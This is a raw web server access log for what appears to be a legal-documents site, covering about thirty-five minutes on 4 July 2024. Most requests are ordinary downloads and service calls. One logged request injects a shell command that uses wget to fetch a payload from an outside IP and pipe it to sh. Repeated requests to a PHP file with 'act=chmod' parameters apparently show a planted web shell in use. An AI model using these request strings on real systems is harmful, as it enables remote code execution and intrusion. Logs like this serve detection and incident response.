192.178.6.6 - - [04/Jul/2024:01:08:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202004/RES%202004%201351-1400/00001384.tif HTTP/1.1" 200 106254
201.245.192.253 - - [04/Jul/2024:01:08:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38712
201.245.192.253 - - [04/Jul/2024:01:08:32 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [04/Jul/2024:01:09:22 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2425.pdf HTTP/1.1" 200 487890
201.245.192.253 - - [04/Jul/2024:01:09:32 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [04/Jul/2024:01:08:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [04/Jul/2024:01:10:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0090.pdf HTTP/1.1" 200 492975
201.245.192.253 - - [04/Jul/2024:01:10:11 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [04/Jul/2024:01:08:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 45535
172.22.2.4 - - [04/Jul/2024:01:10:20 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
201.245.192.253 - - [04/Jul/2024:01:10:32 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [04/Jul/2024:01:09:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 46420
216.244.66.195 - - [04/Jul/2024:01:10:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0712.pdf HTTP/1.1" 200 309527
216.244.66.195 - - [04/Jul/2024:01:11:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0833.pdf HTTP/1.1" 200 303864
201.245.192.253 - - [04/Jul/2024:01:11:32 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [04/Jul/2024:01:12:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0874.pdf HTTP/1.1" 200 2454688
201.245.192.253 - - [04/Jul/2024:01:12:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [04/Jul/2024:01:12:14 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [04/Jul/2024:01:12:32 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [04/Jul/2024:01:12:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1038.pdf HTTP/1.1" 200 439541
192.178.6.6 - - [04/Jul/2024:01:12:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0762.pdf HTTP/1.1" 200 512985
201.245.192.253 - - [04/Jul/2024:01:13:25 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38712
201.245.192.253 - - [04/Jul/2024:01:13:32 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [04/Jul/2024:01:13:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1583.pdf HTTP/1.1" 200 402603
47.128.54.230 - - [04/Jul/2024:01:13:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=5386.pdf HTTP/1.1" 200 2739
172.22.2.4 - - [04/Jul/2024:01:12:52 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
47.128.115.82 - - [04/Jul/2024:01:13:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=4690.pdf HTTP/1.1" 200 2714
47.128.127.23 - - [04/Jul/2024:01:14:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=5159.pdf HTTP/1.1" 200 2714
216.244.66.195 - - [04/Jul/2024:01:14:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1756.pdf HTTP/1.1" 200 790038
201.245.192.253 - - [04/Jul/2024:01:14:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.123.81 - - [04/Jul/2024:01:14:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=4832.pdf HTTP/1.1" 200 2714
201.245.192.253 - - [04/Jul/2024:01:14:32 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.54.184 - - [04/Jul/2024:01:14:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=05078.pdf HTTP/1.1" 200 2714
141.98.83.197 - - [04/Jul/2024:01:14:39 -0500] "GET / HTTP/1.1" 200 319
216.244.66.195 - - [04/Jul/2024:01:14:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2040.pdf HTTP/1.1" 200 293569
47.128.125.129 - - [04/Jul/2024:01:14:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=03902.pdf HTTP/1.1" 200 2714
47.128.124.22 - - [04/Jul/2024:01:15:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=5291.pdf HTTP/1.1" 200 2739
216.244.66.195 - - [04/Jul/2024:01:15:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2538.pdf HTTP/1.1" 200 399017
47.128.125.144 - - [04/Jul/2024:01:15:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&base64=3&f=search11.xml HTTP/1.1" 200 2740
192.178.6.5 - - [04/Jul/2024:01:15:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/8276.pdf HTTP/1.1" 200 430039
192.178.6.6 - - [04/Jul/2024:01:15:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20551-600/00000558.tif HTTP/1.1" 200 309090
201.245.192.253 - - [04/Jul/2024:01:15:32 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.98.138 - - [04/Jul/2024:01:15:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=3240-.pdf HTTP/1.1" 200 2740
216.244.66.195 - - [04/Jul/2024:01:15:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2817.pdf HTTP/1.1" 200 372345
172.22.2.4 - - [04/Jul/2024:01:14:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.125.119 - - [04/Jul/2024:01:15:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=5077.pdf HTTP/1.1" 200 2740
216.244.66.195 - - [04/Jul/2024:01:16:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2857.pdf HTTP/1.1" 200 279448
201.245.192.253 - - [04/Jul/2024:01:16:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
192.178.6.5 - - [04/Jul/2024:01:16:24 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/Analisis%20jurisprudencial%20Sentencia%20C-366-11.doc HTTP/1.1" 304 -
192.178.6.7 - - [04/Jul/2024:01:16:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/3957.pdf HTTP/1.1" 200 1428643
201.245.192.253 - - [04/Jul/2024:01:16:32 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [04/Jul/2024:01:14:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57485
216.244.66.195 - - [04/Jul/2024:01:16:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0018.pdf HTTP/1.1" 200 3418920
201.245.192.253 - - [04/Jul/2024:01:16:47 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38709
201.245.192.253 - - [04/Jul/2024:01:16:51 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34833
48.217.211.89 - - [04/Jul/2024:01:17:02 -0500] "GET /portal/redlion HTTP/1.1" 404 1018
216.244.66.195 - - [04/Jul/2024:01:17:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0708.pdf HTTP/1.1" 200 1324389
216.245.221.92 - - [04/Jul/2024:01:17:14 -0500] "HEAD / HTTP/1.1" 200 -
192.178.6.5 - - [04/Jul/2024:01:17:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/1142.pdf HTTP/1.1" 200 232970
201.245.192.253 - - [04/Jul/2024:01:17:32 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [04/Jul/2024:01:17:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%201996/RESOLUCION%2087%20DE%201996.pdf HTTP/1.1" 200 32533
216.244.66.195 - - [04/Jul/2024:01:18:08 -0500] "GET /BLA/resoluciones/AUTOS%202007/0207.pdf HTTP/1.1" 200 18847
201.245.192.253 - - [04/Jul/2024:01:18:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [04/Jul/2024:01:18:23 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38712
192.178.6.5 - - [04/Jul/2024:01:18:26 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/7523.pdf HTTP/1.1" 200 538408
201.245.192.253 - - [04/Jul/2024:01:18:32 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [04/Jul/2024:01:18:36 -0500] "GET /BLA/resoluciones/AUTOS%202007/0224.pdf HTTP/1.1" 200 16917
216.244.66.195 - - [04/Jul/2024:01:19:02 -0500] "GET /BLA/resoluciones/AUTOS%202007/0250.pdf HTTP/1.1" 200 16837
201.245.192.253 - - [04/Jul/2024:01:19:02 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33618
216.244.66.195 - - [04/Jul/2024:01:19:28 -0500] "GET /BLA/resoluciones/AUTOS%202007/0377.pdf HTTP/1.1" 200 274016
201.245.192.253 - - [04/Jul/2024:01:19:32 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [04/Jul/2024:01:20:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [04/Jul/2024:01:20:32 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
192.178.6.6 - - [04/Jul/2024:01:20:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/3088.pdf HTTP/1.1" 200 858741
152.61.128.50 - - [04/Jul/2024:01:20:50 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [04/Jul/2024:01:21:32 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
114.119.132.101 - - [04/Jul/2024:01:21:32 -0500] "GET /galeria/galeria/fotos/Humedal-techo1G.jpg HTTP/1.1" 200 396540
172.22.2.4 - - [04/Jul/2024:01:19:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [04/Jul/2024:01:19:51 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 14506
201.245.192.253 - - [04/Jul/2024:01:22:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [04/Jul/2024:01:22:14 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [04/Jul/2024:01:20:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59967
201.245.192.253 - - [04/Jul/2024:01:22:32 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
192.178.6.6 - - [04/Jul/2024:01:22:33 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/CUADRO%20ANALISIS%20SENTENCIA%20T-411%20DE%201992.doc HTTP/1.1" 200 41984
192.178.6.6 - - [04/Jul/2024:01:22:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202004/RES%202004%201651-1700/00001659.tif HTTP/1.1" 200 152290
201.245.192.253 - - [04/Jul/2024:01:23:22 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38712
201.245.192.253 - - [04/Jul/2024:01:23:32 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [04/Jul/2024:01:24:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [04/Jul/2024:01:24:32 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
192.178.6.5 - - [04/Jul/2024:01:24:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/3202.pdf HTTP/1.1" 200 524659
216.244.66.195 - - [04/Jul/2024:01:24:58 -0500] "GET /robots.txt HTTP/1.1" 404 1018
47.128.31.38 - - [04/Jul/2024:01:25:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=5569.pdf HTTP/1.1" 200 2714
47.128.109.6 - - [04/Jul/2024:01:25:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=5602.pdf HTTP/1.1" 200 2714
201.245.192.253 - - [04/Jul/2024:01:25:32 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.48.249 - - [04/Jul/2024:01:25:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=6603.pdf HTTP/1.1" 200 2714
47.128.123.161 - - [04/Jul/2024:01:25:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=4136.pdf HTTP/1.1" 200 2714
201.245.192.253 - - [04/Jul/2024:01:26:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.48.213 - - [04/Jul/2024:01:26:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=4215.pdf HTTP/1.1" 200 2714
47.128.127.200 - - [04/Jul/2024:01:26:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=00473.pdf HTTP/1.1" 200 2740
201.245.192.253 - - [04/Jul/2024:01:26:32 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
192.178.6.6 - - [04/Jul/2024:01:26:34 -0500] "GET /BLA/resoluciones/AUTOS%202013/0664.pdf HTTP/1.1" 200 1189826
47.128.21.249 - - [04/Jul/2024:01:26:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&c=1&f=00705.pdf HTTP/1.1" 200 2740
201.245.192.253 - - [04/Jul/2024:01:26:47 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38709
201.245.192.253 - - [04/Jul/2024:01:26:48 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34833
47.128.97.86 - - [04/Jul/2024:01:27:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=4671.pdf HTTP/1.1" 200 2739
216.245.221.92 - - [04/Jul/2024:01:27:14 -0500] "HEAD / HTTP/1.1" 200 -
47.128.43.136 - - [04/Jul/2024:01:27:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=4909.pdf HTTP/1.1" 200 2739
172.22.2.4 - - [04/Jul/2024:01:25:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [04/Jul/2024:01:27:32 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.19.102 - - [04/Jul/2024:01:27:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&base64=2&f=search11.xml HTTP/1.1" 200 2740
192.178.6.5 - - [04/Jul/2024:01:27:35 -0500] "GET /BLA/resoluciones/AUTOS%202018/5343.pdf HTTP/1.1" 200 342729
192.178.6.7 - - [04/Jul/2024:01:27:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/2640.pdf HTTP/1.1" 200 989553
47.128.36.235 - - [04/Jul/2024:01:27:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=4273.pdf HTTP/1.1" 200 2739
47.128.111.102 - - [04/Jul/2024:01:28:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=4136.pdf HTTP/1.1" 200 2739
201.245.192.253 - - [04/Jul/2024:01:28:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [04/Jul/2024:01:26:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
47.128.48.19 - - [04/Jul/2024:01:28:17 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=sess_hrpfqv09cd9kv436c09699iqd5 HTTP/1.1" 200 2714
201.245.192.253 - - [04/Jul/2024:01:28:21 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38712
201.245.192.253 - - [04/Jul/2024:01:28:32 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.36.24 - - [04/Jul/2024:01:28:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=5204.pdf HTTP/1.1" 200 2714
47.128.110.97 - - [04/Jul/2024:01:28:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=02680.pdf HTTP/1.1" 200 2714
201.245.192.253 - - [04/Jul/2024:01:29:02 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33618
47.128.24.134 - - [04/Jul/2024:01:29:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=3982.pdf HTTP/1.1" 200 2738
47.128.42.244 - - [04/Jul/2024:01:29:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=4063.pdf HTTP/1.1" 200 2740
31.220.1.83 - - [04/Jul/2024:01:29:30 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 1018
201.245.192.253 - - [04/Jul/2024:01:29:32 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.61.248 - - [04/Jul/2024:01:29:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&c=1&f=00400.pdf HTTP/1.1" 200 2740
192.178.6.5 - - [04/Jul/2024:01:29:36 -0500] "GET /BLA/boletinlegal/Directivas/2011/Directiva%20No.%2011%20del%2027%20de%20Diciembre%20de%202011.pdf HTTP/1.1" 304 -
47.128.110.50 - - [04/Jul/2024:01:29:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=3946.pdf HTTP/1.1" 200 2714
201.245.192.253 - - [04/Jul/2024:01:29:50 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34833
66.249.64.33 - - [04/Jul/2024:01:29:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202004/RES%202004%201551-1600/00001553.tif HTTP/1.1" 200 116402
47.128.62.238 - - [04/Jul/2024:01:30:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=4948.pdf HTTP/1.1" 200 2714
201.245.192.253 - - [04/Jul/2024:01:30:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [04/Jul/2024:01:30:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
192.178.6.5 - - [04/Jul/2024:01:30:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/6297.pdf HTTP/1.1" 200 800176
201.245.192.253 - - [04/Jul/2024:01:31:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [04/Jul/2024:01:32:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [04/Jul/2024:01:32:14 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [04/Jul/2024:01:32:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [04/Jul/2024:01:31:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [04/Jul/2024:01:33:20 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38712
201.245.192.253 - - [04/Jul/2024:01:33:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [04/Jul/2024:01:32:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 49224
201.245.192.253 - - [04/Jul/2024:01:34:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [04/Jul/2024:01:34:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [04/Jul/2024:01:35:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
201.245.192.253 - - [04/Jul/2024:01:35:33 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
192.178.6.7 - - [04/Jul/2024:01:35:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/9050.pdf HTTP/1.1" 200 529787
201.245.192.253 - - [04/Jul/2024:01:36:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [04/Jul/2024:01:36:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
192.178.6.5 - - [04/Jul/2024:01:37:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%201501-1550/20021509.tif HTTP/1.1" 200 179188
216.245.221.92 - - [04/Jul/2024:01:37:14 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [04/Jul/2024:01:37:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [04/Jul/2024:01:36:47 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 31858
201.245.192.253 - - [04/Jul/2024:01:37:47 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34833
201.245.192.253 - - [04/Jul/2024:01:38:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [04/Jul/2024:01:38:18 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38712
201.245.192.253 - - [04/Jul/2024:01:38:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
192.178.6.5 - - [04/Jul/2024:01:38:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/5121.pdf HTTP/1.1" 200 639846
192.178.6.5 - - [04/Jul/2024:01:38:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/3115.pdf HTTP/1.1" 200 475865
201.245.192.253 - - [04/Jul/2024:01:39:02 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33618
172.22.2.4 - - [04/Jul/2024:01:37:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [04/Jul/2024:01:39:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.113.164 - - [04/Jul/2024:01:39:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=02598.pdf HTTP/1.1" 200 2714
172.22.2.4 - - [04/Jul/2024:01:38:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59967
47.128.122.9 - - [04/Jul/2024:01:39:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=5965.pdf HTTP/1.1" 200 2739
192.178.6.7 - - [04/Jul/2024:01:39:58 -0500] "GET /BLA/resoluciones/AUTOS%202018/1725.pdf HTTP/1.1" 200 542256
172.22.2.4 - - [04/Jul/2024:01:40:11 -0500] "GET /BLA/boletinlegal/Circulares/2023/CIRCULAR%20No.%2000002%20DEL%2020%20DE%20FEBRERO%20DEL%202023.pdf HTTP/1.1" 304 -
201.245.192.253 - - [04/Jul/2024:01:40:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.59.44 - - [04/Jul/2024:01:40:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=01094.pdf HTTP/1.1" 200 2739
47.128.125.40 - - [04/Jul/2024:01:40:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=4097.pdf HTTP/1.1" 200 2739
201.245.192.253 - - [04/Jul/2024:01:40:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.22.126 - - [04/Jul/2024:01:40:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=3757.pdf HTTP/1.1" 200 2739
192.178.6.5 - - [04/Jul/2024:01:40:59 -0500] "GET /BLA/resoluciones/AUTOS%202018/2320.pdf HTTP/1.1" 200 260378
47.128.96.244 - - [04/Jul/2024:01:40:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=05277.pdf HTTP/1.1" 200 2740
201.245.192.253 - - [04/Jul/2024:01:39:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34833
47.128.58.189 - - [04/Jul/2024:01:41:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=5180.pdf HTTP/1.1" 200 2740
47.128.58.178 - - [04/Jul/2024:01:41:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=5000.pdf HTTP/1.1" 200 2714
201.245.192.253 - - [04/Jul/2024:01:41:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.54.15 - - [04/Jul/2024:01:41:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=4810.pdf HTTP/1.1" 200 2739
47.128.58.249 - - [04/Jul/2024:01:42:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=5229.pdf HTTP/1.1" 200 2714
192.178.6.5 - - [04/Jul/2024:01:42:02 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/8428.pdf HTTP/1.1" 200 559546
201.245.192.253 - - [04/Jul/2024:01:42:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [04/Jul/2024:01:42:14 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [04/Jul/2024:01:42:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [04/Jul/2024:01:43:16 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38712
201.245.192.253 - - [04/Jul/2024:01:43:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
